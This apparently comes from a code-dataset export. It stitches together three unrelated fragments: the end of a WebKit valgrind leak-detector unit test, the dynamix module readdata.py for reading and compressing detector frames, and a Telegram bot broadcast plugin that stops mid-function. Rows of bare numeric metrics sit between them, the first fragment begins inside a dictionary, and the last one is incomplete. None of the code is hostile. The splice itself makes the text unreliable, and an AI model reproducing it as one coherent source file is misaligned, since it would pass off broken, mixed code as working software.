    '_ZN7WebCore14DocumentLoader16responseReceivedEPNS_14CachedResourceERKNS_16ResourceResponseE': u'WebCore::DocumentLoader::responseReceived(WebCore::CachedResource*, WebCore::ResourceResponse const&)',
    '_ZN7WebCore17CachedRawResource16responseReceivedERKNS_16ResourceResponseE': u'WebCore::CachedRawResource::responseReceived(WebCore::ResourceResponse const&)',
    '_ZN7WebCore17SubresourceLoader18didReceiveResponseERKNS_16ResourceResponseE': u'WebCore::SubresourceLoader::didReceiveResponse(WebCore::ResourceResponse const&)',
    '_ZN7WebCoreL19sendRequestCallbackEP8_GObjectP13_GAsyncResultPv': u'WebCore::sendRequestCallback(_GObject*, _GAsyncResult*, void*)',
    'g_task_return_now': u'g_task_return_now',
    'complete_in_idle_cb': u'complete_in_idle_cb',
    'g_main_context_dispatch': u'g_main_context_dispatch',
    'g_main_context_iterate.isra.23': u'g_main_context_iterate.isra.23',
    'g_main_loop_run': u'g_main_loop_run',
    'gtk_main': u'gtk_main',
}
def make_mock_valgrind_results_incomplete():
    """Return the expected log output for a truncated valgrind XML file.

    The parser echoes the unparseable XML prefix together with the expat
    "no element found" error, and the suppression summary that follows is
    empty because no complete log could be read.
    """
    return """could not parse <?xml version="1.0"?>
<valgrindoutput>
<protocolversion>4</protocolversion>
<protocoltool>memcheck</protocoltool>
<preamble>
<line>Memcheck, a memory error detector</line>
<line>Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.</line>
<line>Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info</line>
<line>Command: /home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree -</line>
</preamble>
<pid>28531</pid>
<ppid>18577</ppid>
<tool>memcheck</tool>
<args>
<vargv>
<exe>/usr/bin/valgrind.bin</exe>
<arg>--tool=memcheck</arg>
<arg>--num-callers=40</arg>
<arg>--demangle=no</arg>
<arg>--trace-children=no</arg>
<arg>--smc-check=all-non-file</arg>
<arg>--leak-check=yes</arg>
<arg>--leak-resolution=high</arg>
<arg>--show-possibly-lost=no</arg>
<arg>--show-reachable=no</arg>
<arg>--leak-check=full</arg>
<arg>--undef-value-errors=no</arg>
<arg>--gen-suppressions=all</arg>
<arg>--xml=yes</arg>
<arg>--xml-file=/home/user/WebKit/WebKitBuild/Release/layout-test-results/drt-28531-e8c7d7b83be411e390c9d43d7e01ba08-leaks.xml</arg>
<arg>--suppressions=/home/user/WebKit/Tools/Scripts/valgrind/suppressions.txt</arg>
<arg>--suppressions=/usr/lib/valgrind/debian-libc6-dbg.supp</arg>
</vargv>
<argv>
<exe>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</exe>
<arg>-</arg>
</argv>
</args>
<status>
<state>RUNNING</state>
<time>00:00:00:00.024 </time>
</status>
: no element found: line 49, column 0
-----------------------------------------------------
Suppressions used:
count name
-----------------------------------------------------
"""
def make_mock_valgrind_results_empty():
    """Return the expected log output for an empty leaks file.

    Parsing an empty file fails immediately ("line 1, column 0"), so only
    the error line and an empty suppression summary are printed.
    """
    return """could not parse : no element found: line 1, column 0
-----------------------------------------------------
Suppressions used:
count name
-----------------------------------------------------
"""
def make_mock_valgrind_results_misformatted():
    """Return the expected log output for a leaks file with leading junk.

    Junk before the XML prologue makes expat fail with a syntax error; the
    parser echoes the offending prefix and an empty suppression summary.
    """
    return """could not parse Junk that should not appear in a valgrind xml file<?xml version="1.0"?: syntax error: line 1, column 0
-----------------------------------------------------
Suppressions used:
count name
-----------------------------------------------------
"""
def mock_run_cppfilt_command(args):
    """Stand-in for Executive.run_command that fakes c++filt demangling.

    When the command line invokes `c++filt`, the mangled symbol (third
    element of *args*) is looked up in valgrind_output_cppfilt_map; any
    other command produces an empty string.
    """
    if args[0] != 'c++filt':
        return ""
    mangled_symbol = string_utils.decode(args[2], target_type=str)
    return valgrind_output_cppfilt_map[mangled_symbol]
class LeakDetectorValgrindTest(unittest.TestCase):
    """Unit tests for LeakDetectorValgrind.parse_and_print_leaks_detail()."""

    def test_parse_and_print_leaks_detail_pass(self):
        """Two complete valgrind XML logs yield the full leaks report."""
        files = {
            '/tmp/layout-test-results/drt-28529-db92e4843be411e3bae1d43d7e01ba08-leaks.xml':
                make_mock_valgrind_output('DumpRenderTree', 28529, 'db92e4843be411e3bae1d43d7e01ba08'),
            '/tmp/layout-test-results/drt-28530-dd7213423be411e3aa7fd43d7e01ba08-leaks.xml':
                make_mock_valgrind_output('DumpRenderTree', 28530, 'dd7213423be411e3aa7fd43d7e01ba08'),
        }
        detector = LeakDetectorValgrind(MockExecutive2(run_command_fn=mock_run_cppfilt_command), MockFileSystem(files), '/tmp/layout-test-results/')
        OutputCapture().assert_outputs(self, detector.parse_and_print_leaks_detail, [files], expected_logs=make_mock_valgrind_results())

    def test_parse_and_print_leaks_detail_incomplete(self):
        """A truncated valgrind XML log is reported as unparseable."""
        files = {
            '/tmp/layout-test-results/drt-28531-e8c7d7b83be411e390c9d43d7e01ba08-leaks.xml':
                make_mock_incomplete_valgrind_output('DumpRenderTree', 28531, 'e8c7d7b83be411e390c9d43d7e01ba08'),
        }
        detector = LeakDetectorValgrind(MockExecutive2(), MockFileSystem(files), '/tmp/layout-test-results/')
        OutputCapture().assert_outputs(self, detector.parse_and_print_leaks_detail, [files], expected_logs=make_mock_valgrind_results_incomplete())

    def test_parse_and_print_leaks_detail_empty(self):
        """An empty leaks file is reported as unparseable."""
        files = {
            '/tmp/Logs/layout-test-results/drt-28532-ebc9a6c63be411e399d4d43d7e01ba08-leaks.xml': "",
        }
        detector = LeakDetectorValgrind(MockExecutive2(), MockFileSystem(files), '/tmp/layout-test-results/')
        OutputCapture().assert_outputs(self, detector.parse_and_print_leaks_detail, [files], expected_logs=make_mock_valgrind_results_empty())

    def test_parse_and_print_leaks_detail_misformatted(self):
        """Leading junk before the XML prologue is reported as a syntax error."""
        self.maxDiff = None
        files = {
            '/tmp/layout-test-results/drt-28533-fa6d0cd63be411e39c72d43d7e01ba08-leaks.xml':
                'Junk that should not appear in a valgrind xml file' + make_mock_valgrind_output('DumpRenderTree', 28533, 'fa6d0cd63be411e39c72d43d7e01ba08')[:20],
        }
        detector = LeakDetectorValgrind(MockExecutive2(), MockFileSystem(files), '/tmp/layout-test-results/')
        OutputCapture().assert_outputs(self, detector.parse_and_print_leaks_detail, [files], expected_logs=make_mock_valgrind_results_misformatted())
| 51.707403
| 956
| 0.767084
| 4,769
| 44,003
| 6.856783
| 0.112602
| 0.020795
| 0.036391
| 0.062691
| 0.843884
| 0.802171
| 0.779174
| 0.767554
| 0.75633
| 0.746575
| 0
| 0.057929
| 0.09888
| 44,003
| 850
| 957
| 51.768235
| 0.766746
| 0.029453
| 0
| 0.738562
| 0
| 0.120261
| 0.922684
| 0.665854
| 0
| 0
| 0.008997
| 0
| 0.005229
| 1
| 0.014379
| false
| 0.048366
| 0.007843
| 0.007843
| 0.033987
| 0.010458
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4c4a8c3715e209395878d30c55cb512377cb6e24
| 15,161
|
py
|
Python
|
dynamix/io/readdata.py
|
kif/dynamix
|
163323ccb083bb069d88f3b51c0dfb3141f5fd37
|
[
"MIT"
] | 3
|
2021-01-12T05:46:51.000Z
|
2021-04-13T15:05:42.000Z
|
dynamix/io/readdata.py
|
kif/dynamix
|
163323ccb083bb069d88f3b51c0dfb3141f5fd37
|
[
"MIT"
] | 18
|
2019-08-23T08:42:36.000Z
|
2021-09-13T15:14:38.000Z
|
dynamix/io/readdata.py
|
kif/dynamix
|
163323ccb083bb069d88f3b51c0dfb3141f5fd37
|
[
"MIT"
] | 6
|
2019-08-01T12:10:52.000Z
|
2021-12-09T14:55:02.000Z
|
#! /usr/bin/env python3
# readdata
import numpy as np
import numba as nb
from dynamix.io import nfiles
import _pickle as cPickle
from dynamix.correlator.WXPCS import dropimgood, eigerpix
from multiprocessing import Process, Queue
from dynamix.io import EdfMethods
from sys import exit, stdout
import time
import h5py # HDF5 support
import hdf5plugin
import os
os.environ["HDF5_USE_FILE_LOCKING"] = "FALSE"
####### Save pixels and intensities ######
def events_load(fname):
    """Load event-mode pixel data previously written by events_save().

    :param fname: path to the pickle file
    :return: tuple ``(pixels, s)`` exactly as stored in the file
    """
    # Context manager guarantees the handle is closed even if unpickling
    # raises (the original leaked the handle on error).
    with open(fname, 'rb') as edata:
        pixels, s = cPickle.load(edata)
    return pixels, s
def events_save(fname, pixels, s):
    """Save event-mode pixel data so events_load() can read it back.

    :param fname: destination path
    :param pixels: per-frame event pixel data
    :param s: per-frame event counts
    :return: None
    """
    # Context manager flushes and closes the file even if pickling fails
    # part-way (the original leaked the handle on error).  Protocol -1
    # selects the highest protocol, as before.
    with open(fname, 'wb') as edata:
        cPickle.dump([pixels, s], edata, -1)
    return
######## Read npz #####
def readnpz(FileName):
    """Read the first array stored in an .npz archive.

    :param FileName: path to a .npz file (e.g. one written by savenpz())
    :return: the first array in the archive, whatever its key
    """
    # np.load() on an .npz returns an NpzFile holding an open zip handle;
    # the context manager closes it even if array extraction raises (the
    # original leaked the handle on error).
    with np.load(FileName) as f:
        # The key is not assumed to be 'data'; return whichever array was
        # stored first, matching the original behavior.
        return f[f.files[0]]
######## save npz #####
def savenpz(FileName, data):
    """Write *data* into a compressed .npz archive under the key ``data``.

    :param FileName: destination path (numpy appends '.npz' if missing)
    :param data: array-like payload to store
    """
    np.savez_compressed(FileName, data=data)
######### processing the file for Eiger,Maxipix etc ##############
def mread_eiger(mfilename, mdataout, ind_g, mNp, nx):
    """Worker: convert Eiger/Maxipix edf frames to event form.

    For every file in *mfilename* the frame is loaded, the unmasked
    pixels (selected by *ind_g*) are converted to event pixels via
    eigerpix(), and the triple [pixels, n_pixels, frame] is put on the
    *mdataout* queue.  The queue is closed once all files are done.
    """
    for fname in mfilename:
        frame = EdfMethods.loadedf(fname)
        npix, pix = eigerpix(frame[ind_g], mNp, nx)
        mdataout.put([pix[:npix], npix, frame])
    mdataout.close()
###########################################
# ######### processing the file for CCD ##############
def mread_ccd(mfilename, mdataout, darkimg, lth, bADU, tADU, mNp, aduph, nx, ny):
    """Worker: dropletize CCD frames and queue the results.

    Each file in *mfilename* is loaded, converted to float32 and passed
    with the dark image and the ADU thresholds to dropimgood(); the
    resulting triple [pixels, n_pixels, processed_frame] is put on the
    *mdataout* queue.  The queue is closed when all files are processed.
    """
    for mfile in mfilename:
        # np.asfarray() was deprecated and removed in NumPy 2.0;
        # np.asarray() with an explicit float32 dtype is the exact
        # equivalent.
        matr = np.asarray(EdfMethods.loadedf(mfile), dtype=np.float32)
        # Dropletize the CCD frame.
        msumpix, mpix, tmp = dropimgood(matr, darkimg, lth, bADU, tADU, mNp, aduph, nx, ny)
        mpix = mpix[:msumpix]
        mdataout.put([mpix, msumpix, tmp])
    mdataout.close()
# ###########################################
def get_data(datdir, prefd, sufd, nf1, nf2):
    """Read a series of Maxipix/Eiger edf frames into one uint16 array.

    :param datdir: directory containing the data files
    :param prefd: file-name prefix
    :param sufd: file-name suffix
    :param nf1: first file number
    :param nf2: last file number
    :return: array of shape (n_files, Dim_2, Dim_1), dtype uint16
    """
    t0 = time.time()
    swrite = stdout.write
    sflush = stdout.flush
    print("start reading the files")
    # Build the list of file names for the requested range.
    filenames = nfiles.filename(datdir + prefd, sufd, nf1, nf2)
    lfilenames = len(filenames)
    # Read only the first header to size the output array.
    headers = EdfMethods.headeredf(filenames[0])
    dim1 = np.intc(headers['Dim_1'])
    dim2 = np.intc(headers['Dim_2'])
    nx = dim2
    ny = dim1
    data = np.zeros((lfilenames, nx, ny), np.uint16)
    # enumerate() replaces the original hand-maintained index counter.
    for i, mfile in enumerate(filenames):
        data[i, :, :] = EdfMethods.loadedf(mfile)
        # '\x08' is backspace: overwrite the previous percentage in place.
        swrite(4 * '\x08')
        swrite(str(int((i + 1) * 100. / lfilenames)) + '%')
        sflush()
    print("\n")
    print("Reading time %3.3f sec" % (time.time() - t0))
    return data
def get_eiger_event_data(datdir, prefd, sufd, nf1, nf2, sname, mNp, savdir, mask_file):
    """Read Maxipix/Eiger edf frames and convert them for the event correlator.

    Two worker processes (mread_eiger) each read every second file and
    stream ``[event_pixels, n_events, frame]`` through a Queue; the main
    loop interleaves the two queues to restore frame order.

    Returns
    -------
    tuple
        (pixels, s, for_norm, img): per-frame event pixel lists, per-frame
        event counts, number of unmasked pixels, and the summed image.
    """
    time0 = time.time()
    swrite = stdout.write
    sflush = stdout.flush
    print("start reading the files")
    # creating filenames
    filenames = nfiles.filename(datdir + prefd, sufd, nf1, nf2)
    lfilenames = len(filenames)
    # reading first image to get dimensions of the matrix
    headers = EdfMethods.headeredf(filenames[0])
    dim1 = np.intc(headers['Dim_1'])
    dim2 = np.intc(headers['Dim_2'])
    # reading mask; on failure fall back to an all-good mask
    try:
        mask_data = EdfMethods.loadedf(mask_file)
        print("use mask file " + mask_file)
        ind = np.where(mask_data > 0)
        ind_g = np.where(mask_data < 1)
        for_norm = dim1 * dim2 - len(mask_data[ind])
    except Exception:
        print("no mask applied")
        # BUGFIX: ind_g was left undefined here, crashing at len(img[ind_g])
        # below; define an all-pixels-good mask instead.
        mask_data = np.zeros((dim2, dim1), np.uint8)
        ind_g = np.where(mask_data < 1)
        for_norm = dim1 * dim2
    print("Numebr of pixels used " + str(for_norm))
    # summed image accumulator
    img = np.zeros((dim2, dim1))
    pixels = []
    s = []
    data = []
    pread = []
    nx = len(img[ind_g])
    for i in range(2):
        data.append(Queue(2))
    # BUGFIX: the first slice was filenames[:-1:2], which drops the last
    # file when the count is odd and deadlocks the consumer loop below.
    pread.append(Process(target=mread_eiger, args=(filenames[0::2], data[0], ind_g, mNp, nx)))
    pread.append(Process(target=mread_eiger, args=(filenames[1::2], data[1], ind_g, mNp, nx)))
    for i in range(2):
        pread[i].start()
    ii = 0
    # reading and summing files: alternate queues to keep frame order
    for i in range(lfilenames):
        swrite(4 * '\x08')
        swrite(str(int(i * 100. / lfilenames)) + '%')
        sflush()
        fromproc = data[ii].get()
        pixels.append(fromproc[0])
        s.append(fromproc[1])
        img += fromproc[2]
        ii += 1
        if ii == 2:
            ii = 0
    for i in range(2):
        pread[i].join()
        data[i].close()
    dtime = time.time() - time0
    print('reading of %d files took %5.2f sec' % (lfilenames, dtime))
    if not os.path.exists(savdir):
        answ = input("create a director (y)/n").lower()
        if answ == "n":
            print("exit")
            exit()
        else:
            os.makedirs(savdir)
            print("directory " + savdir + " has been created")
    return pixels, s, for_norm, img
def get_ccd_event_data(datdir, prefd, sufd, nf1, nf2, darkdir, df1, df2, sname, lth, bADU, tADU, mNp, aduph, savdir, mask_file):
    """Read CCD edf frames, dark-correct and dropletize for the event correlator.

    A dark image is averaged from darkdir/df1..df2, then two worker
    processes (mread_ccd) each read every second data file and stream
    events through a Queue; the main loop interleaves the queues.

    Returns
    -------
    tuple
        (pixels, s, for_norm, img): per-frame event pixel lists, per-frame
        event counts, number of unmasked pixels, and the summed image.
    """
    time0 = time.time()
    swrite = stdout.write
    sflush = stdout.flush
    print("start reading the files")
    # creating filenames
    filenames = nfiles.filename(datdir + prefd, sufd, nf1, nf2)
    lfilenames = len(filenames)
    # reading first image to get dimensions of the matrix
    headers = EdfMethods.headeredf(filenames[0])
    dim1 = np.intc(headers['Dim_1'])
    dim2 = np.intc(headers['Dim_2'])
    nx = dim2
    ny = dim1
    # reading mask (only used for the pixel-count normalization here)
    try:
        mask_data = EdfMethods.loadedf(mask_file)
        print("use mask file " + mask_file)
        ind = np.where(mask_data > 0)
        for_norm = dim1 * dim2 - len(mask_data[ind])
    except Exception:
        print("no mask applied")
        for_norm = dim1 * dim2
    print("Numebr of pixels used " + str(for_norm))
    # summed image accumulator
    img = np.zeros((dim2, dim1))
    # reading dark: average all dark frames
    darkfilenames = nfiles.filename(darkdir + prefd, sufd, df1, df2)
    ndarks = 0
    for dfile in darkfilenames:
        if ndarks == 0:
            darkimg = np.asfarray(EdfMethods.loadedf(dfile), dtype=np.float32)
        else:
            darkimg += np.asfarray(EdfMethods.loadedf(dfile), dtype=np.float32)
        ndarks += 1
    darkimg = darkimg / ndarks
    pixels = []
    s = []
    data = []
    pread = []
    for i in range(2):
        data.append(Queue(2))
    # BUGFIX: the first slice was filenames[:-1:2], which drops the last
    # file when the count is odd and deadlocks the consumer loop below.
    pread.append(Process(target=mread_ccd, args=(filenames[0::2], data[0], darkimg, lth, bADU, tADU, mNp, aduph, nx, ny)))
    pread.append(Process(target=mread_ccd, args=(filenames[1::2], data[1], darkimg, lth, bADU, tADU, mNp, aduph, nx, ny)))
    for i in range(2):
        pread[i].start()
    ii = 0
    # reading and summing files: alternate queues to keep frame order
    for i in range(lfilenames):
        swrite(4 * '\x08')
        swrite(str(int(i * 100. / lfilenames)) + '%')
        sflush()
        fromproc = data[ii].get()
        pixels.append(fromproc[0])
        s.append(fromproc[1])
        img += fromproc[2]
        ii += 1
        if ii == 2:
            ii = 0
    for i in range(2):
        pread[i].join()
        data[i].close()
    dtime = time.time() - time0
    print('reading of %d files took %5.2f sec' % (lfilenames, dtime))
    if not os.path.exists(savdir):
        # .lower() added for consistency with the other prompts, so 'N' works
        answ = input("create a director (y)/n").lower()
        if answ == "n":
            print("exit")
            exit()
        else:
            os.makedirs(savdir)
            print("directory " + savdir + " has been created")
    return pixels, s, for_norm, img
def get_delta(datdir, prefd, sufd, nf1, nf2, scan="1"):
    """Return the detector 'delta' angle for a dataset.

    For '.edf' data the value is parsed from an edf header (the 11th file
    is probed — presumably to skip possibly-bad leading frames; TODO
    confirm).  For '.h5' data it is read from the BLISS positioner group
    of the given *scan*.

    Raises
    ------
    ValueError
        If *sufd* is neither '.edf' nor '.h5' (previously this fell
        through to a confusing NameError on the return line).
    """
    if sufd == ".edf":
        filenames = nfiles.filename(datdir + prefd, sufd, nf1, nf2)
        h = EdfMethods.headeredf(filenames[10])
        # motor_mne lists motor names, motor_pos the matching positions
        delta = float(h['motor_pos'].split(" ")[h['motor_mne'].split(" ").index('del')])
    elif sufd == ".h5":
        filename = datdir + prefd + sufd
        with h5py.File(filename, mode="r") as h5:
            delta = h5['/' + scan + '.1/instrument/positioners/delta'][()]
    else:
        raise ValueError("unsupported data suffix %r (expected '.edf' or '.h5')" % sufd)
    return delta
def get_eiger_event_datan(datdir, prefd, sufd, nf1, nf2, sname, mNp, savdir, mask_file, thr=20, frc=0.15):
    """Read Eiger edf frames and compress them for the numba event correlator.

    Frames are read sequentially; neigercompress() accumulates, per pixel,
    the event values (evs), their frame indices (tms) and counts (cnt),
    plus the average frame (afr) and a per-frame intensity trace.  Pixels
    exceeding *thr* are added to the mask as hot pixels.

    Parameters
    ----------
    thr : int
        Hot-pixel threshold applied by neigercompress.
    frc : float
        Fraction of frames used to size the per-pixel event buffers.

    Returns
    -------
    tuple
        (evs, tms, cnt, afr, n_frames, mask, trace)
    """
    t0 = time.time()
    swrite = stdout.write
    sflush = stdout.flush
    print("start reading the files")
    # creating filenames
    filenames = nfiles.filename(datdir + prefd, sufd, nf1, nf2)
    lfilenames = len(filenames)
    # reading first image to get dimensions of the matrix
    headers = EdfMethods.headeredf(filenames[0])
    dim1 = np.intc(headers['Dim_1'])
    dim2 = np.intc(headers['Dim_2'])
    nx = dim2
    ny = dim1
    # reading mask; fall back to an empty (all-good) mask
    try:
        mask_data = EdfMethods.loadedf(mask_file)
        print("use mask file " + mask_file)
        ind = np.where(mask_data > 0)
        for_norm = dim1 * dim2 - len(mask_data[ind])
    except Exception:
        mask_data = np.zeros((dim2, dim1), np.uint8)
        print("no mask applied")
        for_norm = dim1 * dim2
    print("Numebr of pixels used " + str(for_norm))
    n_frames = len(filenames)
    ll = nx * ny  # total number of pixels
    lp = int(n_frames * frc)  # per-pixel event buffer length (frc of all frames)
    mask = np.array(np.ravel(mask_data), np.uint8)
    evs = np.zeros((ll, lp), np.uint8)
    tms = np.zeros((ll, lp), np.uint16)
    cnt = np.ravel(np.zeros((ll,), np.uint16))
    afr = np.ravel(np.zeros((ll,), np.uint32))
    tr = 0
    trace = np.zeros((n_frames,), np.uint32)
    it = 0
    print("Number of frames %d" % n_frames)
    # reading and compressing files
    for i in range(lfilenames):
        swrite(4 * '\x08')
        swrite(str(int(i * 100. / lfilenames)) + '%')
        sflush()
        matr = EdfMethods.loadedf(filenames[i])
        # zero masked pixels; 'ind' only exists when a mask file was loaded
        try:
            matr[ind] = 0
        except Exception:
            pass
        fr = np.ravel(matr)
        evs, tms, cnt, afr, mask, tr = neigercompress(evs, tms, cnt, afr, mask, tr, fr, thr, it, ll, lp)
        trace[i] = tr
        it += 1
    if not os.path.exists(savdir):
        # .lower() added for consistency with the other prompts, so 'N' works
        answ = input("create a director (y)/n").lower()
        if answ == "n":
            print("exit")
            exit()
        else:
            os.makedirs(savdir)
            print("directory " + savdir + " has been created")
    afr = afr / n_frames
    afr = np.reshape(afr, (nx, ny))
    mask = np.reshape(mask, (nx, ny))
    # compact the sparse event buffers into flat arrays
    evs, tms, c = nprepare(np.ravel(evs), np.ravel(tms))
    evs = np.array(evs[:c], np.int8)
    tms = tms[:c]
    print("Reading time %3.3f sec" % (time.time() - t0))
    return evs, tms, cnt, afr, n_frames, mask, trace
def get_ccd_event_datan(datdir, prefd, sufd, nf1, nf2, darkdir, df1, df2, sname, lth, bADU, tADU, mNp, aduph, savdir, mask_file, thr=20, frc=0.15):
    # Read CCD edf frames, dark-correct and dropletize them, and compress
    # the result for the numba event correlator (same layout as
    # get_eiger_event_datan: per-pixel event buffers evs/tms/cnt, average
    # frame afr, per-frame trace, hot-pixel mask).
    t0 = time.time()
    swrite = stdout.write
    sflush = stdout.flush
    print("start reading the files")
    # creating filenames
    filenames = nfiles.filename(datdir + prefd, sufd, nf1, nf2)
    lfilenames = len(filenames)  # -1
    # reading first image to get dimensions of the matrix
    headers = EdfMethods.headeredf(filenames[0])
    dim1 = np.intc(headers['Dim_1'])
    dim2 = np.intc(headers['Dim_2'])
    nx = dim2
    ny = dim1
    # reading mask; on any failure fall back to an empty (all-good) mask
    try:
        mask_data = EdfMethods.loadedf(mask_file)
        print("use mask file " + mask_file)
        ind = np.where(mask_data > 0)
        for_norm = dim1 * dim2 - len(mask_data[ind])
    except:
        mask_data = np.zeros((dim2, dim1), np.uint8)
        print("no mask applied")
        for_norm = dim1 * dim2  # 1024**2
        pass
    print("Numebr of pixels used " + str(for_norm))
    # reading dark: average all dark frames into one float32 image
    darkfilenames = nfiles.filename(darkdir + prefd, sufd, df1, df2)
    ndarks = 0
    for dfile in darkfilenames:
        if ndarks == 0:
            darkimg = np.asfarray(EdfMethods.loadedf(dfile), dtype=np.float32)
        else:
            darkimg += np.asfarray(EdfMethods.loadedf(dfile), dtype=np.float32)
        ndarks += 1
    darkimg = darkimg / ndarks
    n_frames = len(filenames)
    ll = nx * ny  # total number of pixels
    lp = int(n_frames * frc)  # total number of frames with events 15%
    mask = np.array(np.ravel(mask_data), np.uint8)
    evs = np.zeros((ll, lp), np.uint8)   # per-pixel event values
    tms = np.zeros((ll, lp), np.uint16)  # per-pixel frame indices of events
    cnt = np.ravel(np.zeros((ll,), np.uint16))  # per-pixel event counts
    afr = np.ravel(np.zeros((ll,), np.uint32))  # summed (later averaged) frame
    tr = 0
    trace = np.zeros((n_frames,), np.uint32)  # per-frame total intensity
    it = 0
    print("Number of frames %d" % n_frames)
    # reading and compressing files
    for i in range(lfilenames):
        swrite(4 * '\x08')
        swrite(str(int(i * 100. / lfilenames)) + '%')
        sflush()
        matr = np.asfarray(EdfMethods.loadedf(filenames[i]), dtype=np.float32)
        # zero masked pixels; 'ind' only exists when a mask file was loaded
        try:
            matr[ind] = 0
        except:
            pass
        msumpix, mpix, fr = dropimgood(matr, darkimg, lth, bADU, tADU, mNp, aduph, nx, ny)  # dropletize CCD frames
        fr = np.ravel(fr)
        evs, tms, cnt, afr, mask, tr = neigercompress(evs, tms, cnt, afr, mask, tr, fr, thr, it, ll, lp)
        trace[i] = tr
        it += 1
    if not os.path.exists(savdir):
        answ = input("create a director (y)/n").lower()
        if answ == "n":
            print("exit")
            exit()
        else:
            os.makedirs(savdir)
            print("directory " + savdir + " has been created")
    afr = afr / n_frames
    afr = np.reshape(afr, (nx, ny))
    mask = np.reshape(mask, (nx, ny))
    # compact the sparse event buffers into flat arrays of length c
    evs, tms, c = nprepare(np.ravel(evs), np.ravel(tms))
    evs = np.array(evs[:c], np.int8)
    tms = tms[:c]
    print("Reading time %3.3f sec" % (time.time() - t0))
    return evs, tms, cnt, afr, n_frames, mask, trace
@nb.jit(nopython=True, parallel=True, fastmath=True)
def neigercompress(evs, tms, cnt, afr, m, tr, fr, thr, i, ll, max_e):
    # Accumulate one frame *fr* (flattened, length ll) into the event store.
    # Per pixel p: add to the average-frame sum afr; mark the pixel as
    # masked (m[p]=1) if its value exceeds thr (hot pixel); zero masked
    # pixels; for remaining nonzero pixels record the value and frame
    # index i in evs/tms and bump cnt.  tr is recomputed from scratch as
    # this frame's total intensity over unmasked pixels.
    # NOTE(review): events are stored starting at index cnt[p]+1, so slot 0
    # of each pixel row is never used — presumably intentional, since
    # nprepare() later drops zero entries; confirm.  max_e (buffer width)
    # is not bounds-checked here.
    tr = 0
    for p in nb.prange(ll):  # parallel over pixels; tr is a prange reduction
        afr[p] += fr[p]
        if fr[p] > thr:
            m[p] = 1
        if m[p] > 0:
            fr[p] = 0
        if fr[p] > 0:
            c = cnt[p] + 1
            evs[p, c] = fr[p]
            tms[p, c] = i
            cnt[p] = c
        tr += fr[p]
    return evs, tms, cnt, afr, m, tr
@nb.jit(nopython=True, fastmath=True)
def nprepare(evs, tms):
    """Compact nonzero events (and their frame times) to the array front, in place.

    Returns the modified arrays and the number of entries kept.
    """
    total = evs.size
    kept = 0
    for k in range(total):
        if evs[k] > 0:
            evs[kept] = evs[k]
            tms[kept] = tms[k]
            kept += 1
    return evs, tms, kept
| 32.326226
| 147
| 0.566783
| 2,042
| 15,161
| 4.157199
| 0.125367
| 0.016021
| 0.022971
| 0.025445
| 0.814819
| 0.791613
| 0.782189
| 0.766286
| 0.757097
| 0.749676
| 0
| 0.027044
| 0.270761
| 15,161
| 468
| 148
| 32.395299
| 0.740774
| 0.100983
| 0
| 0.763587
| 0
| 0
| 0.067134
| 0.003958
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038043
| false
| 0.016304
| 0.032609
| 0
| 0.100543
| 0.089674
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d5b35c26d1380ae4ceef61cd7793dba035ae6dae
| 3,243
|
py
|
Python
|
Yukki/Plugins/broadcast.py
|
Guddu7866/YukkiMusic-Old
|
a6d04fb434d5302e187c11d41be5964914e9e329
|
[
"MIT"
] | null | null | null |
Yukki/Plugins/broadcast.py
|
Guddu7866/YukkiMusic-Old
|
a6d04fb434d5302e187c11d41be5964914e9e329
|
[
"MIT"
] | null | null | null |
Yukki/Plugins/broadcast.py
|
Guddu7866/YukkiMusic-Old
|
a6d04fb434d5302e187c11d41be5964914e9e329
|
[
"MIT"
] | null | null | null |
import asyncio
from Yukki import app, OWNER
from pyrogram import filters, Client
from pyrogram.types import Message
from Yukki.YukkiUtilities.database.chats import (get_served_chats, is_served_chat, add_served_chat, get_served_chats)
from ..YukkiUtilities.helpers.filters import command
@app.on_message(filters.command("broadcastt_pin") & filters.user(OWNER))
async def broadcast_message_pin(_, message):
    """Broadcast to every served chat and pin the delivered message.

    If the command replies to a message, that message is forwarded;
    otherwise the text after the command is sent as a new message.
    """
    if message.reply_to_message:
        src_msg = message.reply_to_message.message_id
        src_chat = message.chat.id
        sent = 0
        pin = 0
        targets = [int(chat["chat_id"]) for chat in await get_served_chats()]
        for chat_id in targets:
            try:
                m = await app.forward_messages(chat_id, src_chat, src_msg)
                try:
                    await m.pin(disable_notification=False)
                    pin += 1
                except Exception:
                    pass
                await asyncio.sleep(.3)  # throttle to avoid flood limits
                sent += 1
            except Exception:
                pass
        await message.reply_text(f"✅ **broadcasted message in {sent} chats\n\n📌 with {pin} pins.**")
        return
    if len(message.command) < 2:
        await message.reply_text("**usage**:\n/broadcast (message)")
        return
    text = message.text.split(None, 1)[1]
    sent = 0
    pin = 0
    targets = [int(chat["chat_id"]) for chat in await get_served_chats()]
    for chat_id in targets:
        try:
            m = await app.send_message(chat_id, text=text)
            try:
                await m.pin(disable_notification=False)
                pin += 1
            except Exception:
                pass
            await asyncio.sleep(.3)  # throttle to avoid flood limits
            sent += 1
        except Exception:
            pass
    await message.reply_text(f"✅ **broadcasted message in {sent} chats\n📌 with {pin} pins.**")
@app.on_message(filters.command("broadcastt") & filters.user(OWNER))
async def broadcast_message_nopin(_, message):
    """Broadcast to every served chat without pinning.

    If the command replies to a message, that message is forwarded;
    otherwise the text after the command is sent as a new message.
    """
    if message.reply_to_message:
        x = message.reply_to_message.message_id
        y = message.chat.id
        sent = 0
        chats = []
        schats = await get_served_chats()
        for chat in schats:
            chats.append(int(chat["chat_id"]))
        for i in chats:
            try:
                await app.forward_messages(i, y, x)
                await asyncio.sleep(0.3)  # throttle to avoid flood limits
                sent += 1
            except Exception:
                pass
        # BUGFIX: the closing ** was missing, breaking the bold markup
